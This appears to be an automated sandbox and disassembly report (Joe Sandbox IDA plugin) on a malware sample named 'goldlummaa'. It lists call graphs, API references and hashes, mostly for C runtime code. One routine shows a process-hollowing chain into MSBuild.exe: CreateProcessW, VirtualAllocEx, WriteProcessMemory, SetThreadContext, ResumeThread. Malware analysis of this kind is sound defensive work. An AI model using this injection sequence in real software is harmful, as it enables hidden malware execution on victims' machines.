CallUnexpected 39 API calls 9818 c67ee6 9817->9818 9819->9817 9821 c66b6a 9820->9821 9822 c66b59 9820->9822 9836 c66cc6 9821->9836 9823 c64fd4 CallUnexpected GetModuleHandleW 9822->9823 9825 c66b5e 9823->9825 9825->9821 9831 c66a60 GetModuleHandleExW 9825->9831 9827 c66a18 9827->8379 9832 c66ab3 9831->9832 9833 c66a9f GetProcAddress 9831->9833 9834 c66ac6 FreeLibrary 9832->9834 9835 c66acf 9832->9835 9833->9832 9834->9835 9835->9821 9837 c66cd2 ___scrt_is_nonwritable_in_current_image 9836->9837 9851 c696f8 EnterCriticalSection 9837->9851 9839 c66cdc 9852 c66bc3 9839->9852 9841 c66ce9 9856 c66d07 9841->9856 9844 c66afb 9881 c66ae2 9844->9881 9846 c66b05 9847 c66b19 9846->9847 9848 c66b09 GetCurrentProcess TerminateProcess 9846->9848 9849 c66a60 CallUnexpected 3 API calls 9847->9849 9848->9847 9850 c66b21 ExitProcess 9849->9850 9851->9839 9854 c66bcf ___scrt_is_nonwritable_in_current_image CallUnexpected 9852->9854 9853 c66c33 CallUnexpected 9853->9841 9854->9853 9859 c6726d 9854->9859 9880 c6970f LeaveCriticalSection 9856->9880 9858 c66ba2 9858->9827 9858->9844 9860 c67279 __EH_prolog3 9859->9860 9863 c674f8 9860->9863 9862 c672a0 CallUnexpected 9862->9853 9864 c67504 ___scrt_is_nonwritable_in_current_image 9863->9864 9871 c696f8 EnterCriticalSection 9864->9871 9866 c67512 9872 c673c3 9866->9872 9871->9866 9873 c673e2 9872->9873 9874 c673da 9872->9874 9873->9874 9875 c6a83b __freea 14 API calls 9873->9875 9876 c67547 9874->9876 9875->9874 9879 c6970f LeaveCriticalSection 9876->9879 9878 c67530 9878->9862 9879->9878 9880->9858 9884 c6b0bf 9881->9884 9883 c66ae7 CallUnexpected 9883->9846 9885 c6b0ce CallUnexpected 9884->9885 9886 c6b0db 9885->9886 9888 c6944e 9885->9888 9886->9883 9889 c69599 _unexpected 5 API calls 9888->9889 9890 c6946a 9889->9890 9890->9886 9892 c665a4 9891->9892 9894 c665b6 ___scrt_uninitialize_crt 9891->9894 9893 c665b2 9892->9893 9896 c6ac17 9892->9896 9893->8416 9894->8416 9899 c6ad42 9896->9899 9902 c6ae1b 9899->9902 9903 c6ae27 ___scrt_is_nonwritable_in_current_image 9902->9903 9910 c696f8 EnterCriticalSection 9903->9910 9905 c6ae31 ___scrt_uninitialize_crt 9906 c6ae9d 9905->9906 9911 c6ad8f 9905->9911 9919 c6aebb 9906->9919 9910->9905 9912 c6ad9b ___scrt_is_nonwritable_in_current_image 9911->9912 9922 c66616 EnterCriticalSection 9912->9922 9914 c6ada5 ___scrt_uninitialize_crt 9918 c6adde 9914->9918 9923 c6ac20 9914->9923 9936 c6ae0f 9918->9936 10035 c6970f LeaveCriticalSection 9919->10035 9921 c6ac1e 9921->9893 9922->9914 9924 c6ac35 __strnicoll 9923->9924 9925 c6ac47 9924->9925 9926 c6ac3c 9924->9926 9939 c6ac85 9925->9939 9927 c6ad42 ___scrt_uninitialize_crt 68 API calls 9926->9927 9929 c6ac42 9927->9929 9931 c67ad9 __strnicoll 39 API calls 9929->9931 9933 c6ac7f 9931->9933 9933->9918 9934 c6ac68 9952 c6d7df 9934->9952 10034 c6662a LeaveCriticalSection 9936->10034 9938 c6adfd 9938->9905 9940 c6ac9e 9939->9940 9944 c6ac51 9939->9944 9941 c6d0a3 ___scrt_uninitialize_crt 39 API calls 9940->9941 9940->9944 9942 c6acba 9941->9942 9963 c6db1a 9942->9963 9944->9929 9945 c6d0a3 9944->9945 9946 c6d0c4 9945->9946 9947 c6d0af 9945->9947 9946->9934 9948 c6aec7 __strnicoll 14 API calls 9947->9948 9949 c6d0b4 9948->9949 9950 c6786b __strnicoll 39 API calls 9949->9950 9951 c6d0bf 9950->9951 9951->9934 9953 c6d7f0 9952->9953 9956 c6d7fd 9952->9956 9954 c6aec7 __strnicoll 14 API calls 9953->9954 9962 c6d7f5 9954->9962 9955 c6d846 9957 c6aec7 __strnicoll 14 API calls 9955->9957 9956->9955 9958 c6d824 9956->9958 9959 c6d84b 9957->9959 10004 c6d85c 9958->10004 9960 c6786b __strnicoll 39 API calls 9959->9960 9960->9962 9962->9929 9965 c6db26 ___scrt_is_nonwritable_in_current_image 9963->9965 9964 c6db67 9966 c67a14 __strnicoll 29 API calls 9964->9966 9965->9964 9967 c6dbad 9965->9967 9973 c6db2e 9965->9973 9966->9973 9974 c6d047 EnterCriticalSection 9967->9974 9969 c6dbb3 9970 c6dbd1 9969->9970 9975 c6d8fe 9969->9975 10001 c6dc23 9970->10001 9973->9944 9974->9969 9976 c6d926 9975->9976 9980 c6d949 ___scrt_uninitialize_crt 9975->9980 9977 c6d92a 9976->9977 9979 c6d985 9976->9979 9978 c67a14 __strnicoll 29 API calls 9977->9978 9978->9980 9981 c6d9a3 9979->9981 9982 c6f111 ___scrt_uninitialize_crt 41 API calls 9979->9982 9980->9970 9983 c6dc2b ___scrt_uninitialize_crt 40 API calls 9981->9983 9982->9981 9984 c6d9b5 9983->9984 9985 c6da02 9984->9985 9986 c6d9bb 9984->9986 9987 c6da16 9985->9987 9988 c6da6b WriteFile 9985->9988 9989 c6d9ea 9986->9989 9994 c6d9c3 9986->9994 9992 c6da57 9987->9992 9993 c6da1e 9987->9993 9988->9980 9990 c6da8d GetLastError 9988->9990 9991 c6dca8 ___scrt_uninitialize_crt 45 API calls 9989->9991 9990->9980 9991->9980 9995 c6e0d7 ___scrt_uninitialize_crt 7 API calls 9992->9995 9996 c6da43 9993->9996 9997 c6da23 9993->9997 9994->9980 9998 c6e06f ___scrt_uninitialize_crt 6 API calls 9994->9998 9995->9980 9999 c6e29b ___scrt_uninitialize_crt 8 API calls 9996->9999 9997->9980 10000 c6e1b2 ___scrt_uninitialize_crt 7 API calls 9997->10000 9998->9980 9999->9980 10000->9980 10002 c6d06a ___scrt_uninitialize_crt LeaveCriticalSection 10001->10002 10003 c6dc29 10002->10003 10003->9973 10005 c6d868 ___scrt_is_nonwritable_in_current_image 10004->10005 10017 c6d047 EnterCriticalSection 10005->10017 10007 c6d877 10015 c6d8bc 10007->10015 10018 c6cdfe 10007->10018 10008 c6aec7 __strnicoll 14 API calls 10011 c6d8c3 10008->10011 10010 c6d8a3 FlushFileBuffers 10010->10011 10012 c6d8af GetLastError 10010->10012 10031 c6d8f2 10011->10031 10013 c6aeda __dosmaperr 14 API calls 10012->10013 10013->10015 10015->10008 10017->10007 10019 c6ce20 10018->10019 10020 c6ce0b 10018->10020 10022 c6aeda __dosmaperr 14 API calls 10019->10022 10024 c6ce45 10019->10024 10021 c6aeda __dosmaperr 14 API calls 10020->10021 10023 c6ce10 10021->10023 10025 c6ce50 10022->10025 10026 c6aec7 __strnicoll 14 API calls 10023->10026 10024->10010 10028 c6aec7 __strnicoll 14 API calls 10025->10028 10027 c6ce18 10026->10027 10027->10010 10029 c6ce58 10028->10029 10030 c6786b __strnicoll 39 API calls 10029->10030 10030->10027 10032 c6d06a ___scrt_uninitialize_crt LeaveCriticalSection 10031->10032 10033 c6d8db 10032->10033 10033->9962 10034->9938 10035->9921 10036 c7a1a9 10041 c7a1df 10036->10041 10037 c7a32c GetPEB 10038 c7a33e CreateProcessW VirtualAlloc Wow64GetThreadContext ReadProcessMemory VirtualAllocEx 10037->10038 10039 c7a3e5 WriteProcessMemory 10038->10039 10038->10041 10040 c7a42a 10039->10040 10042 c7a42f WriteProcessMemory 10040->10042 10043 c7a46c WriteProcessMemory Wow64SetThreadContext ResumeThread 10040->10043 10041->10037 10041->10038 10042->10040

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00C7A11B,00C7A10B), ref: 00C7A33F
                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00C7A352
                                                                                                                  • Wow64GetThreadContext.KERNEL32(00000104,00000000), ref: 00C7A370
                                                                                                                  • ReadProcessMemory.KERNELBASE(00000108,?,00C7A15F,00000004,00000000), ref: 00C7A394
                                                                                                                  • VirtualAllocEx.KERNELBASE(00000108,?,?,00003000,00000040), ref: 00C7A3BF
                                                                                                                  • WriteProcessMemory.KERNELBASE(00000108,00000000,?,?,00000000,?), ref: 00C7A417
                                                                                                                  • WriteProcessMemory.KERNELBASE(00000108,00400000,?,?,00000000,?,00000028), ref: 00C7A462
                                                                                                                  • WriteProcessMemory.KERNELBASE(00000108,?,?,00000004,00000000), ref: 00C7A4A0
                                                                                                                  • Wow64SetThreadContext.KERNEL32(00000104,00DF0000), ref: 00C7A4DC
                                                                                                                  • ResumeThread.KERNELBASE(00000104), ref: 00C7A4EB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                                  • API String ID: 2687962208-3857624555
                                                                                                                  • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                                  • Instruction ID: f05ae44afc5af4e8989a2231f134c887e0900e99286f229fa5443b36d38bdd1a
                                                                                                                  • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                                  • Instruction Fuzzy Hash: F5B1F67664064AAFDB60CF68CC80BDA73A5FF88714F158124EA1CAB341D774FA51CB94

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 26 c694ce-c694da 27 c6956c-c6956f 26->27 28 c69575 27->28 29 c694df-c694f0 27->29 30 c69577-c6957b 28->30 31 c694f2-c694f5 29->31 32 c694fd-c69516 LoadLibraryExW 29->32 33 c69595-c69597 31->33 34 c694fb 31->34 35 c6957c-c6958c 32->35 36 c69518-c69521 GetLastError 32->36 33->30 38 c69569 34->38 35->33 37 c6958e-c6958f FreeLibrary 35->37 39 c69523-c69535 call c6b403 36->39 40 c6955a-c69567 36->40 37->33 38->27 39->40 43 c69537-c69549 call c6b403 39->43 40->38 43->40 46 c6954b-c69558 LoadLibraryExW 43->46 46->35 46->40
                                                                                                                  APIs
                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,50496CFE,?,00C695DD,?,?,00000000), ref: 00C6958F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeLibrary
                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                  • API String ID: 3664257935-537541572
                                                                                                                  • Opcode ID: 3b3de5b394a9cedecce6513b924cc981b61146c7087d0783f16be9b79c0409d8
                                                                                                                  • Instruction ID: 98cae194ae27ed5b32745a9e70ecce2ad716a9fb7a0ecd7dde225fda461a1c8b
                                                                                                                  • Opcode Fuzzy Hash: 3b3de5b394a9cedecce6513b924cc981b61146c7087d0783f16be9b79c0409d8
                                                                                                                  • Instruction Fuzzy Hash: 54212731A01211A7CB328B65ECC4B6E376CDB45771F240220E92BE7290DB30EF45C6E0

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: File$CloseCreateHandleSize
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1378416451-0
                                                                                                                  • Opcode ID: 6de21070ea14a6c1a887fde9624166fe325c926e45db808f01cddbfc06e8140a
                                                                                                                  • Instruction ID: 6ff80b9a74b463431307ed1183f65f44a46b8824bbc788efc6f807fd515594ff
                                                                                                                  • Opcode Fuzzy Hash: 6de21070ea14a6c1a887fde9624166fe325c926e45db808f01cddbfc06e8140a
                                                                                                                  • Instruction Fuzzy Hash: 588110B0D0A248CFCB20DFA8D584BAEBBF0BF49305F184529E855A7341D7349A49DF96

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 86 c6d525-c6d53e 87 c6d554-c6d559 86->87 88 c6d540-c6d550 call c6f2f0 86->88 90 c6d566-c6d58c call c6b55e 87->90 91 c6d55b-c6d563 87->91 88->87 94 c6d552 88->94 96 c6d702-c6d713 call c63c8e 90->96 97 c6d592-c6d59d 90->97 91->90 94->87 99 c6d6f5 97->99 100 c6d5a3-c6d5a8 97->100 104 c6d6f7 99->104 102 c6d5c1-c6d5cc call c6b3b5 100->102 103 c6d5aa-c6d5b3 call c6e580 100->103 102->104 111 c6d5d2 102->111 103->104 112 c6d5b9-c6d5bf 103->112 106 c6d6f9-c6d700 call c6b43d 104->106 106->96 114 c6d5d8-c6d5dd 111->114 112->114 114->104 115 c6d5e3-c6d5f8 call c6b55e 114->115 115->104 118 c6d5fe-c6d610 call c69357 115->118 120 c6d615-c6d619 118->120 120->104 121 c6d61f-c6d627 120->121 122 c6d661-c6d66d 121->122 123 c6d629-c6d62e 121->123 124 c6d66f-c6d671 122->124 125 c6d6ea 122->125 123->106 126 c6d634-c6d636 123->126 127 c6d686-c6d691 call c6b3b5 124->127 128 c6d673-c6d67c call c6e580 124->128 129 c6d6ec-c6d6f3 call c6b43d 125->129 126->104 130 c6d63c-c6d656 call c69357 126->130 127->129 140 c6d693 127->140 128->129 139 c6d67e-c6d684 128->139 129->104 130->106 141 c6d65c 130->141 142 c6d699-c6d69e 139->142 140->142 141->104 142->129 143 c6d6a0-c6d6b8 call c69357 142->143 143->129 146 c6d6ba-c6d6c1 143->146 147 c6d6e2-c6d6e8 146->147 148 c6d6c3-c6d6c4 146->148 149 c6d6c5-c6d6d7 call c6c8a1 147->149 148->149 149->129 152 c6d6d9-c6d6e0 call c6b43d 149->152 152->106
                                                                                                                  APIs
                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00C6D5AA
                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00C6D673
                                                                                                                  • __freea.LIBCMT ref: 00C6D6DA
                                                                                                                    • Part of subcall function 00C6B3B5: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00C63C34,?,?,00C62442,00001000,?,00C623AA), ref: 00C6B3E7
                                                                                                                  • __freea.LIBCMT ref: 00C6D6ED
                                                                                                                  • __freea.LIBCMT ref: 00C6D6FA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1423051803-0
                                                                                                                  • Opcode ID: 1c79511222b6dc197ca5728741c2e7641e75380fa11d978e45e53d937c779eab
                                                                                                                  • Instruction ID: b07bbc78f9818e0519404f233dc6fb1d30b3467d9987c5d9f83d73e0b77411df
                                                                                                                  • Opcode Fuzzy Hash: 1c79511222b6dc197ca5728741c2e7641e75380fa11d978e45e53d937c779eab
                                                                                                                  • Instruction Fuzzy Hash: 7351F3B2B10246AFEB305F65CCC1EBB3BAAEF44314B190829FD1AD6151EB71CD50D661

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ConsoleFreeProtectVirtual
                                                                                                                  • String ID: @
                                                                                                                  • API String ID: 621788221-2766056989
                                                                                                                  • Opcode ID: c25f455a4425353001c2891736790d47a7f73ee29bcb753346017d0fc5cf0a75
                                                                                                                  • Instruction ID: fa59125e46d467b061809f6e70d5d27410db145ebafda2255b5a39b2bbf57dc5
                                                                                                                  • Opcode Fuzzy Hash: c25f455a4425353001c2891736790d47a7f73ee29bcb753346017d0fc5cf0a75
                                                                                                                  • Instruction Fuzzy Hash: C331A0B0D04208DFDB04DFA9D48979EBBF0BF48318F158829E859AB350D7749A84CF96

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 171 c667f4-c667ff 172 c66815-c66828 call c66885 171->172 173 c66801-c66814 call c6aec7 call c6786b 171->173 178 c66856 172->178 179 c6682a-c66847 CreateThread 172->179 183 c66858-c66864 call c668d5 178->183 181 c66865-c6686a 179->181 182 c66849-c66855 GetLastError call c6aeed 179->182 187 c66871-c66875 181->187 188 c6686c-c6686f 181->188 182->178 187->183 188->187
                                                                                                                  APIs
                                                                                                                  • CreateThread.KERNELBASE(00C634C0,?,Function_0000690C,00000000,?,00C634C0), ref: 00C6683D
                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,00C63379), ref: 00C66849
                                                                                                                  • __dosmaperr.LIBCMT ref: 00C66850
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateErrorLastThread__dosmaperr
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2744730728-0
                                                                                                                  • Opcode ID: 098ec8b3e0153f7545d280d56bc35a437b198a3825a5812fe0da916b161c5aee
                                                                                                                  • Instruction ID: 64c200e96c00c6cf65739b4cbb8d4030ae395fec81d4334b40e64e20f6074e92
                                                                                                                  • Opcode Fuzzy Hash: 098ec8b3e0153f7545d280d56bc35a437b198a3825a5812fe0da916b161c5aee
                                                                                                                  • Instruction Fuzzy Hash: 96015E72900219FBDF259FB1DC85AAE7BA9EF08364F104158F911A7190DB71CE50EBA1

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 191 c6a0ba-c6a0e2 call c6a2bf 194 c6a2a7-c6a2a8 call c6a330 191->194 195 c6a0e8-c6a0ee 191->195 200 c6a2ad-c6a2af 194->200 196 c6a0f1-c6a0f7 195->196 198 c6a1f3-c6a212 call c66360 196->198 199 c6a0fd-c6a109 196->199 210 c6a215-c6a21a 198->210 199->196 201 c6a10b-c6a111 199->201 203 c6a2b0-c6a2be call c63c8e 200->203 204 c6a117-c6a123 IsValidCodePage 201->204 205 c6a1eb-c6a1ee 201->205 204->205 209 c6a129-c6a130 204->209 205->203 211 c6a152-c6a15f GetCPInfo 209->211 212 c6a132-c6a13e 209->212 213 c6a257-c6a261 210->213 214 c6a21c-c6a221 210->214 217 c6a161-c6a180 call c66360 211->217 218 c6a1df-c6a1e5 211->218 216 c6a142-c6a14d 212->216 213->210 215 c6a263-c6a28d call c6a60b 213->215 219 c6a254 214->219 220 c6a223-c6a22b 214->220 231 c6a28e-c6a29d 215->231 222 c6a29f-c6a2a0 call c6a649 216->222 217->216 233 c6a182-c6a189 217->233 218->194 218->205 219->213 224 c6a24c-c6a252 220->224 225 c6a22d-c6a230 220->225 232 c6a2a5 222->232 224->214 224->219 229 c6a232-c6a238 225->229 229->224 230 c6a23a-c6a24a 229->230 230->224 230->229 231->222 231->231 232->200 234 c6a1b5-c6a1b8 233->234 235 c6a18b-c6a190 233->235 236 c6a1bd-c6a1c4 234->236 235->234 237 c6a192-c6a19a 235->237 236->236 238 c6a1c6-c6a1da call c6a60b 236->238 239 c6a19c-c6a1a3 237->239 240 c6a1ad-c6a1b3 237->240 238->216 242 c6a1a4-c6a1ab 239->242 240->234 240->235 242->240 242->242
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00C6A2BF: GetOEMCP.KERNEL32(00000000,?,?,00000000,?), ref: 00C6A2EA
                                                                                                                  • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,00C6A4CA,?,00000000,?,00000000,?), ref: 00C6A11B
                                                                                                                  • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00C6A4CA,?,00000000,?,00000000,?), ref: 00C6A157
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CodeInfoPageValid
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 546120528-0
                                                                                                                  • Opcode ID: 5f3b5f85b92e33be86da218d323882ec047501453c5f5dc7c8c35961c87875b6
                                                                                                                  • Instruction ID: 37c6156b3f90d947a5f825c21aeb3d7078d3272cf630f802cab3277b9a89ff8e
                                                                                                                  • Opcode Fuzzy Hash: 5f3b5f85b92e33be86da218d323882ec047501453c5f5dc7c8c35961c87875b6
                                                                                                                  • Instruction Fuzzy Hash: 8E513470A402458FDB31CF75C8D17AEBBE5FF82300F18806ED1AAA7251D6759A46CF42

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 244 c69eac-c69eb1 245 c69eb3-c69ecb 244->245 246 c69ecd-c69ed1 245->246 247 c69ed9-c69ee2 245->247 246->247 248 c69ed3-c69ed7 246->248 249 c69ef4 247->249 250 c69ee4-c69ee7 247->250 251 c69f4e-c69f52 248->251 254 c69ef6-c69f03 GetStdHandle 249->254 252 c69ef0-c69ef2 250->252 253 c69ee9-c69eee 250->253 251->245 255 c69f58-c69f5b 251->255 252->254 253->254 256 c69f05-c69f07 254->256 257 c69f30-c69f42 254->257 256->257 258 c69f09-c69f12 GetFileType 256->258 257->251 259 c69f44-c69f47 257->259 258->257 260 c69f14-c69f1d 258->260 259->251 261 c69f25-c69f28 260->261 262 c69f1f-c69f23 260->262 261->251 263 c69f2a-c69f2e 261->263 262->251 263->251
                                                                                                                  APIs
                                                                                                                  • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,00C69D9B,00C790B8,0000000C), ref: 00C69EF8
                                                                                                                  • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,00C69D9B,00C790B8,0000000C), ref: 00C69F0A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
